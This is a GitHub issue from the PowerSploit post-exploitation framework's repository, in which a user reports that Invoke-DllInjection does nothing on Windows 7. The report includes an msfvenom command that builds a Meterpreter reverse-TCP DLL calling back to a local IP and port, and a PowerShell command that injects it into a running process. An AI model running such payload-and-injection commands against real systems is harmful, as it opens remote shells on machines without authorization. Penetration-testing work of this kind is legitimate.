PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework
Other
11.77k stars 4.59k forks source link

Invoke-DllInjection not doing anything #284

Closed gnomefish closed 6 years ago

gnomefish commented 6 years ago

SO this is weird,

running on WIN7 64 bit, created a payload (msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 -f dll > met.dll)

.\Invoke-DllInjection.PS1 -ProcessID 1408 -Dll met.dll -verbose

Where 1408 is a 32 bit process...

nothing happens. when I take the same shellcode (http://securityxploded.com/remote-dll-injector.php) it works fine...